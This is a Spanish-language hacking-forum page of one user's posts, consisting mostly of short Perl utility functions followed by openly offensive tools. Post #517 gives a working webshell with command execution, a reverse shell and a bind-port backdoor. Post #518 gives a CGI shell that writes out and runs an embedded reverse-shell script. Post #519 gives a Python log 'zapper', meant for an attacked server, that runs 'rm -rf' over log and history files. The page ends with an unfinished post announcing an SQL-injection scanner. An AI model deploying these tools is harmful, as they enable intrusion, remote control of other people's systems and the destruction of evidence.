Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - BigBear

Páginas 1 ... 24 25 26 27

#501

Perl / [Perl] Funcion printear()

Julio 03, 2011, 09:44:33 PM

Hola a todos , hoy les traigo una funcion para poder
usar colores en perl para mostrar en el texto que queremos

Código: perl


#By Doddy H

use Color::Output;
Color::Output::Init;

sub printear {
if ($_[1] eq "text") {
cprint("\x03".$_[2].$_[0]."\x030\n");
}
elsif ($_[1] eq "stdin") {
if ($_[3] ne "") {
cprint("\x03".$_[2].$_[0]."\x030"."\x03".$_[3]);
my $op = <stdin>;
chomp $op;
cprint ("\x030");
return $op;
}
}
else {
print "error\n";
}
}

Sintasis

Código: perl


printear("text","text/stdin","color text","color output")

Ejemplos de uso

Con texto normal

Código: perl


printear("hola","text","10","5");

Texto con entrada de teclado

Código: perl


my $d  = printear("nombre : ","stdin","6","2");
print "pusiste $d\n";

#502

Perl / [Perl] Funcion movewin()

Julio 03, 2011, 09:44:23 PM

Bueno , con esta funcion podran volver loca a una ventana para
que se mueva de formas maleficas

Código: perl


#By Doddy H
use Win32::API;

sub movewin {
for my $n(1..20) {
Win32::API->new("user32","SetWindowPos",[qw(N N N N N NN)],'N')->Call($_[0],$n,$n,$n,$n,$n,$n);
}
}

Ejemplo de uso

Código: perl


movewin(id ventana);

#503

Perl / [Perl] Funcion killprocess()

Julio 03, 2011, 09:44:12 PM

Hola a todos , aca les traigo un funcion para
cerrar el proceso que odien marcando el nombre y el pid

Código: perl


use Win32::Process;

sub killprocess {

my ($numb,$pid) = @_;

if (Win32::Process::KillProcess($pid,$numb)) {
return true;
} else {
return false;
}
}

Ejemplo de uso

Código: perl


if (killprocess("deamon.exe","4052")) {
print "chau\n\a";
}

#504

Perl / [Perl] Funcion hideit()

Julio 03, 2011, 09:43:57 PM

Con esta funcion podran esconder o mostraR archivos/directorios
ocultos en windows

Código: perl


#By Doddy H
use Win32::File;

sub hideit {
if ($_[1] eq "show") {
Win32::File::SetAttributes($_[0],NORMAL);
}
elsif ($_[1] eq "hide") {
Win32::File::SetAttributes($_[0],HIDDEN);
}
else {
print "error\n";
}
}

Ejemplo de uso show/hide

Código: perl


hideit("test.pl","show");

#505

Perl / [Perl] Funcion getprocess()

Julio 03, 2011, 09:43:46 PM

HOla aca les traigo una funcion que les mostrara los
procesos en su computadora

Código: perl


use Win32::OLE qw(in);

sub getprocess {

my %procesos;

my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
my $dos = $uno->ConnectServer("","root\\cimv2");

foreach my $pro (in $dos->InstancesOf("Win32_Process")){
$procesos{$pro->{Caption}} = $pro->{ProcessId};
}
return %procesos;
}

Ejemplo de uso

Código: perl


my %vida = getprocess();

for my $data(keys %vida) {
print "[Proceso] : ".$data."\n";
print "[PID] : ".$vida{$data}."\n\n";
}

#506

Perl / [Perl] Funcion getmyip()

Julio 03, 2011, 09:41:33 PM

Hola a todos.

Aca les dejo una funcion que hice para reconocer
nuestra IP sin necesidad de usar paginas webs con ese molesto
servicio online

Código: perl


#By Doddy H
use IO::Socket;

sub get_ip {
my $get = gethostbyname("");
return inet_ntoa($get);
}

Ejemplo de uso

Código: perl


print get_ip();

#507

Perl / [Perl] Funcion getlink()

Julio 03, 2011, 09:41:22 PM

Hola a les traigo un funcion para buscar
links en una web

Código: perl


use HTML::LinkExtor;

sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($code);
return @links;

sub agarrar {
my ($a,%b) = @_;
push(@links,values %b); 
}
}

Ejemplo de uso

Código: perl


use LWP::Simple;

$code = get("http://127.0.0.1/doddy/index.php");

my @ver = get_links();

for my $url(@ver) {
print $url."\n";
}

#508

Perl / [Perl] Funcion getdrive()

Julio 03, 2011, 09:41:09 PM

Con esta funcion podran tener el tipo de disco que se e esta ejecutando
actualmente (c:/ o el que sea)

Código: perl


#By Doddy H
use Cwd;


sub getdrive {

$path = getcwd();

if ($path=~/(.*):\/\//ig or $path=~/(.*):\//) {
return $1.":/";
} 

}

Ejemplo de uso

Código: perl


print getdrive();

#509

Perl / [Perl] Funcion download()

Julio 03, 2011, 09:40:55 PM

HOla aca les traigo una funcion para descargar
archivos

Código: perl


#!usr/bin/perl
#Simple downloader in Perl
#By Doddy H

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
return true;
}}}

Sintasis

Código: text


download(url a bajar,nombre de archivo con el que se guarda);

Ejemplo de uso

Código: perl


if (download("http://127.0.0.1/bones.rar","bones.rar")) {
print "[+] file downloaded\n";
}

#510

Perl / [Perl] Funcion crazymouse()

Julio 03, 2011, 09:40:43 PM

Hola a todos

Si yo de nuevo con esta nueva funcion crazymouse()
, con esta funcion podran volver loco al mouse sin poder controlarlo
todo por un tiempo elegido por ustedes , muy util si estan por
hacer un virus

Código: perl


#By Doddy H
use Win32::GuiTest qw(MouseMoveAbsPix SendMessage);

sub crazymouse {
for my $number(1..$_[0]) {
MouseMoveAbsPix($number,$number);
} 
}

Ejemplo de uso

Código: perl


crazymouse("666");

#511

Perl / [Perl] Funcion conectar()

Julio 03, 2011, 09:40:26 PM

Hola a todos.

Aca les dejo una funcion para conectarse mediante sockets al servidor que quieran

Código: perl


use IO::Socket;

sub conectar {

my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
Proto => "tcp",Timeout  => 5);

print $sockex $_[2]."\r\n";
$sockex->read($re,5000);
$sockex->close;
return $re."\r\n";
}

Sintasis

Código: text


conectar(host,puerto,parametro a enviar)

Ejemplo de uso

Código: perl

	
$re = conectar("127.0.0.1","80","GET /sql.php HTTP/1.0\r\n");
print $re;

#512

Perl / [Perl] Funcion cmd()

Julio 03, 2011, 09:40:16 PM

Hola a todos

Acabo de hacer esta funcion cmd() para poder ejecutar comandos
de forma comoda

Código: perl


#By Doddy H

use Win32::Job;

sub cmd {

my $job = Win32::Job->new;
$job->spawn("cmd",qq{cmd /C $_[0]},{
no_window => "true",
stdout => "logx.txt",
stderr => "logx.txt"
}
);
$ok = $job->run("30");

open (F,"logx.txt");
@words = <F>;
close F;

unlink("logx.txt");

return @words;
 
}

Ejemplo de uso

Código: perl


@re = cmd("ver");
print @re;

#513

Perl / [Perl] Funcion cambiar_fondo()

Julio 03, 2011, 09:40:04 PM

Hola a todos

Acabo de hacer un funcion usando las API de Windows para poder
cambiar el fondo de escritorio con solo poner la ruta de la
imagen

Código: perl



#By Doddy H

use Win32::API;

sub cambiar_fondo {

my $a = new Win32::API("user32","SystemParametersInfo", [L,L,P,L],L);
$a->Call(20,0,$_[0],0);

}

Ejemplo de uso

Código: perl


cambiar_fondo("c:/Perl/img.bmp");

#514

Perl / [Perl] FTP Manager

Julio 03, 2011, 09:39:45 PM

Hoy eh terminado este simple cliente FTP el codigo es el siguiente

Código: perl


#!usr/bin/perl
#FTP Manager
#(C) Doddy Hackman 2010

use Net::FTP;

&head;

print "\n\n[FTP Server] : ";
chomp (my $ftp = <stdin>);
print "[User] : ";
chomp (my $user = <stdin>);
print "[Pass] : ";
chomp (my $pass = <stdin>);


if (my $socket = Net::FTP->new($ftp)) {
if ($socket->login($user,$pass)) {

print "\n[+] Enter of the server FTP\n\n";

menu:

print "\n\n>>";
chomp (my $cmd = <stdin>);
print "\n\n";

if ($cmd=~/help/) {
print q(

help : show information
cd : change directory <dir>
dir : list a directory 
mdkdir : create a directory <dir>
rmdir : delete a directory <dir>
pwd : directory  
del : delete a file <file>
rename : change name of the a file <file1> <file2>
size : size of the a file <file>
put : upload a file <file>
get : download a file <file>
cdup : change dir <dir>


);
}

if ($cmd=~/dir/ig) {
if (my @files = $socket->dir()) {
for(@files) {
print "[+] ".$_."\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/pwd/ig) {
print "[+] Path : ".$socket->pwd()."\n";
}

if ($cmd=~/cd (.*)/ig) {
if ($socket->cwd($1)) {
print "[+] Directory changed\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/cdup/ig) {
if (my $dir = $socket->cdup()) {
print "\n\n[+] Directory changed\n\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/del (.*)/ig) {
if ($socket->delete($1)) {
print "[+] File deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/rename (.*) (.*)/ig) {
if ($socket->rename($1,$2)) {
print "[+] File Updated\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/mkdir (.*)/ig) {
if ($socket->mkdir($1)) {
print "\n\n[+] Directory created\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/rmdir (.*)/ig) {
if ($socket->rmdir($1)) {
print "\n\n[+] Directory deleted\n"; 
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/exit/ig) {
copyright();
exit(1);
}

if ($cmd=~/get (.*) (.*)/ig) {
print "\n\n[+] Downloading file\n\n";
if ($socket->get($1,$2)) {
print "[+] Download completed";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/put (.*) (.*)/ig) {
print "\n\n[+] Uploading file\n\n";
if ($socket->put($1,$2)) {
print "[+] Upload completed";
} else {
print "\n\n[-] Error\n\n";
}
}

goto menu;

} else {
print "\n\n[-] Failed the login\n\n";
}

} else {
print "\n\n[-] Error\n\n";
}

sub head {
print "\n\n -- == FTP Manager == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2010\n\n";
}


# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: text


https://sourceforge.net/projects/ftpmanager/

#515

Perl / [Perl] Find paths

Julio 03, 2011, 09:38:44 PM

Un simple scanner para buscar directorios sin index en
la pagina que quieran

Código: perl


#!usr/bin/perl
#Find Paths
#(C) Doddy Hackman 2011

use LWP::UserAgent;
use HTML::LinkExtor;
use URI::Split qw(uri_split);

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] Sintax : $0 <web>\n\n";
} else {
scan($ARGV[0]);
}
copyright();

sub scan {

print "\n[+] Find paths in $_[0]\n\n\n";
my @urls = repes(get_links(toma($_[0])));
for $url(@urls) {
my $web = $url;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
if ($_[0] =~/$auth/ or $auth eq "") {
if ($path=~/(.*)\/(.*)\.(.*)$/) {
my $borrar = $2.".".$3;
if ($web=~/(.*)$borrar/) {
my $co = $1;
unless ($co=~/$auth/) {
$co = $_[0].$co;
}
$code = toma($co);
if ($code=~/Index Of/ig) {
print "[Link] : ".$co."\n";
}}}}}}

sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

sub agarrar {
my ($a,%b) = @_;
push(@links,values %b); 
}
}

sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}

sub head {
print "\n\n-- == Find Paths == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?

#516

Perl / [Perl] DH Player

Julio 03, 2011, 09:38:25 PM

Bueno , este es un simple reproductor de musica que hice en perl
En esta version podran tener buscar musica y reproducirla todo en una ventana grosa

Código: perl


#!usr/bin/perl
#DH Player 0.1
#(C) Doddy Hackman 2011

use Tk;
use Win32::MediaPlayer;

if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}


$test = new Win32::MediaPlayer;

$new = MainWindow->new(-background=>"black");
$new->geometry("350x420+20+20");
$new->resizable(0,0);
$new->title("DH Player 0.1 (C) Doddy Hackman 2011");
$new->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Directory : ")->place(-x=>"20",-y=>"20");
my $dir = $new->Entry(-background=>"black",-foreground=>"green",-text=>"C:\\Users\\Daniel\\Desktop\\WarFactory\\Perl\\musica")->place(-x=>"100",-y=>"25");
$new->Button(-background=>"black",-foreground=>"green",-activebackground=>"green",-text=>"Search",-width=>"10",-command=>\&buscar)->place(-x=>"240",-y=>"25");
$new->Label(-background=>"black",-foreground=>"green",-text=>"Files Found",-font=>"Impact")->place(-y=>"95",-x=>"120");
my $lists = $new->Listbox(-background=>"black",-foreground=>"green")->place(-y=>"130",-x=>"100");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Play",-width=>"55",-activebackground=>"green",-command=>\&play)->place(-y=>"310");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Pause",-width=>"55",-activebackground=>"green",-command=>\&pause)->place(-y=>"333");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Resume",-width=>"55",-activebackground=>"green",-command=>\&resume)->place(-y=>"356");	
$new->Button(-background=>"black",-foreground=>"green",-text=>"Stop",-width=>"55",-activebackground=>"green",-command=>\&stop)->place(-y=>"379");	


MainLoop;


sub play {

my $dir = $dir->get;

$d = $lists->curselection();

for my $id (@$d) {
my $cancion = $lists->get($id);
$test->load($dir."\\".$cancion);
$test->play;	
}

}

sub stop {
$test->close;
}

sub pause {

my $dir = $dir->get;

$d = $lists->curselection();

for my $id (@$d) {
my $cancion = $lists->get($id);
$test->pause;
}

}

sub resume {

my $dir = $dir->get;

$d = $lists->curselection();

for my $id (@$d) {
my $cancion = $lists->get($id);
$test->resume;
}

}

sub buscar {

$lists->delete(0.0,"end");

#$dir = "C:\\Users\\Daniel\\Desktop\\WarFactory\\Perl\\musica";

my $dir = $dir->get;

opendir DIR,$dir;
	
my @archivos = readdir DIR;

close DIR;

chomp @archivos;

foreach my $file(@archivos) {
if (-f $dir."\\".$file) {
$lists->insert("end",$file);
}
}

}


# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: text


https://sourceforge.net/projects/dhplayer/

#517

Perl / [Perl] Commander

Julio 03, 2011, 09:38:14 PM

Bueno este programa es un webserver en perl con la siguientes opciones

* Listar directorios
* Ver archivos
* Borrar directorios y archivos
* ReverseShell
* BindPort

Código: perl


#!usr/bin/perl
#
#C0mmand3r (C) Doddy HAckman 2011
#Version 0.1
#
#A simple WebShell in Perl
#
#

use IO::Socket;
use CGI;
use Cwd;
use HTML::Entities;
use URI::Escape;
use Win32;
use Net::hostent; 

my $port = rep();

sub rep {
unless($ARGV[0]) {
return int("666"); #Your Can Edit 666
} else {
return int($ARGV[0]);
}
}

print "\n\n#########################################\n\n";
print "C0mmand3r (C) Doddy HAckman 2011\n\n\n";
print "[+] Starting the webshell on port $port\n\n";
print "#########################################\n\n";


my $sock = new IO::Socket::INET(
LocalHost => 'localhost',
LocalPort => $port,
Proto     => 'tcp',
Listen    => SOMAXCONN,
Reuse     => 1);


while ($jebus = $sock->accept()) {


print $jebus "HTTP/1.1 200/OK\r\nContent-type:text/html\r\n\r\n";
#print $jebus "HTTP/1.1 200/OK\r\nContent-type:application/w-www-form-urlencoded\r\n\r\n";
next if $slave=fork;

close $sock;

while ($response = <$jebus>) {

chomp($response);

my %rta;


if ($response=~/GET/ig) {
capturar($response);
}


sub capturar {
my $aa = shift;
chomp $aa;
if ($aa=~/GET \/(.*) HTTP\/1.1/ig) {
my $todo = $1;
if ($todo=~/\?(.*)=(.*)&(.*)=(.*)/ig) {
$rta{$1} = $2;
$rta{$3} = $4;
}
if ($todo=~/\?(.*)=(.*)/ig) {
$rta{$1} = $2;
} 
}


}

print $jebus "

<html><body><title>Commander (C) Doddy Hackman 2011</title>

<style type=text/css>

.main {
margin			: -287px 0px 0px -490px;
border			: White solid 1px;
BORDER-COLOR: cyan;
}


#pie {
position: absolute;
bottom: 0;
}

body,a:link {
background-color: #000000;
color:cyan;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:cyan; 
border: solid 1px cyan;
border-color:cyan
}

a:link,a:visited,a:active {
color: cyan;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>


<h2><center>Commander WebShell</center></h2>

";


if ($rta{'loadfile'}) {

my $file = uri_unescape($rta{'loadfile'});


print $jebus "<br><h2><center>File ".$file."</h2></center><br><br>";

if (-f $file) {

print $jebus "<center><textarea name=codefile cols=70 rows=70>";

open (FILE,$file);
@words = <FILE>;
close FILE;

for (@words) {
print $jebus HTML::Entities::encode($_);
}
print $jebus "
</textarea></center>
</center><br><br>
</form>
";

exit(1);
}
}

print $jebus "
<br><br>
<b>Console</b>
<br><br>
<fieldset>";


if ($rta{'cmd'}) {
print $jebus qx($rta{'cmd'});
}


elsif ($rta{'loadir'}) {
my $dir = uri_unescape($rta{'loadir'});
print "recibi $dir\n\n";
if (-d $dir) {
opendir DIR,$dir;
my @archivos = readdir DIR;
close DIR;

for(@archivos) {

if (-d $_) {
print $jebus "<b>".$_."</b><br>"; 	
} else {
print $jebus $_."<br>";
}}}}

elsif ($rta{'delfile'}) {

my $file = uri_unescape($rta{'delfile'});


if (-f $file) {

if (unlink($file)) {
print $jebus "<script>alert('File Deleted');</script>";
} else {
print $jebus "<script>alert('Error');</script>";
}
}
}

elsif ($rta{'deldir'}) {

my $dir = uri_unescape($rta{'deldir'});

if (-d $dir) {
if (rmdir($dir)) {
print $jebus "<script>alert('Directory Deleted');</script>";
} else {
print $jebus "<script>alert('Error');</script>";
}
}
}

elsif ($rta{'ipconnect'}) {
print $rta{'ipconnect'}."\n";
print $rta{'port'}."\n";
conectar($rta{'ipconnect'},$rta{'port'});
tipo();

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root();  
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}
}

elsif($rta{'portbind'}) {

$backdoor = IO::Socket::INET->new(
Proto     => 'tcp',
LocalPort => $rta{'portbind'},
Listen    => SOMAXC,
Reuse     => 1);


while ($jesus = $backdoor->accept()) {
$jesus->autoflush(1);
print $jesus "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : ".$$."\n\n";
print $jesus "Welcome  ".$jesus->peerhost."\n\n";
&extras;
$dir = getcwd();
print $jesus $dir.">>";
while (<$jesus>) {
my $yeah = qx($_);
print $jesus "\n\n".$yeah."\n\n";
print $jesus $dir.">>";
}
}

sub extras {

if ($^O =~//ig) {
print $jesus "[+] Domain Name : ".Win32::DomainName()."\n";
print $jesus "[+] OS Version : ".Win32::GetOSName()."\n";
print $jesus "[+] Username : ".Win32::LoginName()."\n\n\n";
} else {
$s =  qx("uname -a");
print $jesus "--==System Info==--\n\n".$s;
}
}
} else {

opendir DIR,getcwd();
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print $jebus "<b>".$_."</b><br>"; 	
} else {
print $jebus $_."<br>";
}}

}

print $jebus "</fieldset>
<br><br>
<form action='' method=GET>
<b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br>
</form>
<form action='' method=GET>
<B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del>
</form>
<form action='' method=GET>
<b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del>
</form>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>Your IP</B> : <input type=text name=ipconnect value=localhost><br>
<b>Port</b> : <input type=text name=port value=666><br>
<br><input type=submit value=Connect></form><br><br>

<b>BindPort</b><br><br>
<form action='' method=GET>
<b>Port</b> : <input type=text name=portbind value=666><br>
<br><input type=submit value=Bind></form><br><br>


</body></html>
";

$jebus->close;
	
}
		
} continue {
$jebus->close;
}

# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: text


https://sourceforge.net/projects/commanderx/

#518

Perl / [Perl] CGI Shell

Julio 03, 2011, 09:38:00 PM

Hola a todos

Hoy eh terminado de hacer un shell en cgi , estas shells se usan en las paginas que pemiten ejecutar archivos cgi y tienen el directorio cgi-bin

Esta shell tiene las sig opciones

* Listar directorios
* Ver y editar archivos
* Eliminar archivos y directorios
* ReverseShell
* Subir archivos a un directorio especificado
* Ejecutar comandos
* Enviar mails

Código: perl


#!"\xampp\perl\bin\perl.exe"
#
#CGI Shell 0.1
#
#(C) Doddy Hackman 2011
#
#

use CGI;
use Cwd;
use HTML::Entities;
use Net::SMTP;

my %rta;

my $que = new CGI;
my @ques = $que->param;

for(@ques) {
$rta{$_} = $que->param($_);
}


print "Content-type:text/html\n\n";
print "

<style type=text/css>


.main {
margin			: -287px 0px 0px -490px;
border			: White solid 1px;
BORDER-COLOR: #00FF00;
}


#pie {
position: absolute;
bottom: 0;
}

body,a:link {
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:#00FF00; 
border: solid 1px #00FF00;
border-color:#00FF00
}

a:link,a:visited,a:active {
color: #00FF00;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>

<title>CGI Shell (C) Doddy Hackman 2011</title>
<h2><center>CGI Shell</center></h2>

";

if ($rta{'filex'}) {

open FILE ,">>".$rta{'todir'}."/".$rta{'filex'}; 
while($bytes = read($rta{'filex'},$todo, 1024)) {
print FILE $todo;
}
close FILE;

print "<script>alert('File Uploaded');</script>";

}

if ($rta{'codefile'}) {

unlink($rta{'filecode'});

open (FILE,">>".$rta{'filecode'});
print FILE $rta{'codefile'}."\n";
close FILE;

print "<script>alert('File Changed');</script>";

}

if ($rta{'loadfile'}) {
print "<form action='' method=POST>";
print "<br><h2><center>File ".$rta{'loadfile'}."</h2></center><br><br>";

if (-f $rta{'loadfile'}) {

print "<center><textarea name=codefile cols=70 rows=70>";

open (FILE,$rta{'loadfile'});
@words = <FILE>;
close FILE;

for (@words) {
print HTML::Entities::encode($_);
}
print "
</textarea></center>
<input type=hidden name=filecode value=".$rta{'loadfile'}.">
<br><br><center><input type=submit value=Save></center><br><br>
</form>
";

exit(1);
}
}

print "
<br><br>
<b>Console</b>
<br><br>
<fieldset>";


if ($rta{'cmd'}) {
print qx($rta{'cmd'});
}

elsif ($rta{'mail'}) {

my $send = Net::SMTP->new("localhost",Hello => "localhost",Timeout=>10) or die("[-] Error");
$send->mail($rta{'mail'});
$send->to($rta{'to'});   
$send->data(); 
$send->datasend("To:".$rta{'to'}."\n"."From:".$rta{'mail'}."\n"."Subject:".$rta{'subject'}."\n".$rta{'body'}."\n\n"); 
$send->dataend(); 
$send->quit();

}


elsif ($rta{'loadir'}) {

if (-d $rta{'loadir'}) {

opendir DIR,$rta{'loadir'};
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print "<b>".$_."</b><br>"; 	
} else {
print $_."<br>";
}}}}

elsif (-f $rta{'delfile'}) {
if (unlink($rta{'delfile'})) {
print "<script>alert('File Deleted');</script>";
} else {
print "<script>alert('Error');</script>";
}
}

elsif (-d $rta{'deldir'}) {
if (rmdir($rta{'deldir'})) {
print "<script>alert('Directory Deleted');</script>";
} else {
print "<script>alert('Error');</script>";
}
}

elsif ($rta{'ipconnect'}) {

$code = '
#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) { 
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root();  
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}

#The End
';

if ($^O =~/Win32/ig) { 
open (FILE,">>"."back.pl");
chmod("back.pl","777");
} else {
open (FILE,">>"."/tmp/back.pl");
chmod("/tmp/back.pl","777");
}

print FILE $code;
close FILE;

if ($^O == "MSWin32") { 
system("back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
} else {
system("cd /tmp;back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
}
} else {

opendir DIR,getcwd();
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print "<b>".$_."</b><br>"; 	
} else {
print $_."<br>";
}}

}

print "</fieldset>
<br><br>
<form action='' method=GET>
<b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br>
</form>
<form action='' method=GET>
<B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del>
</form>
<form action='' method=GET>
<b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del>
</form>
<form enctype='multipart/form-data' method=POST>
<br><b>Upload File</b> : <input type=file name=filex><br><br>
<b>To dir</b> : <input type=text name=todir value=".getcwd()."><br><br>
<input type=submit value=Upload>
</form>
<br><B>Mailer</b><br><br>
<form action='' method=GET>
<b>Mail</b> : <input type=text name=mail><br>
<b>To</b> : <input type=text name=to><br>
<b>Subject</B> : <input type=text name=subject><br>
<B>Body</B> : <input type=text name=body><br><br>
<input type=submit value=Send>
</form>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>IP</B> : <input type=text name=ipconnect><br>
<b>Port</B> : <input type=text name=port><br>
<br><input type=submit value=Connect></form><br><br>

";


# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: text


https://sourceforge.net/projects/cgishellx/

#519

Python / [Python] Zapper By Doddy H

Julio 03, 2011, 09:37:08 PM

Hola a todos.

Acabo de hacer un simple zapper en python , tan solo lo cargan en el sistema web atacado y comienza
a borrar huellas.
Eso si , no me habia dado cuenta de que facil usar python xDD

Código: python


#!usr/bin/python
#Zapper (C) Doddy Hackman

import os

paths = ["/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access","/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"]

comandos  = ['find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name  *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST']

print "\n[+] Starting the zapper"

for path in paths :
 try :
  os.delete(path)
 except :
  pass

for cmd in comandos :
 try:
  os.system(cmd)
 except:
  pass

print "[+] All logs are erased\n"

#The End ?

#520

Python / [Python] SQL Scanner 0.3

Julio 03, 2011, 09:36:57 PM

Bueno este es un simple scanner en python que hice para SQLI

Con las sig opciones :

Verifica vulnerabilidad
Busca columnas
Busca el numero milagroso y saca info sobre la DB
Saca tablas y columnas de de la DB actual o otra externa
Dumpear usuarios

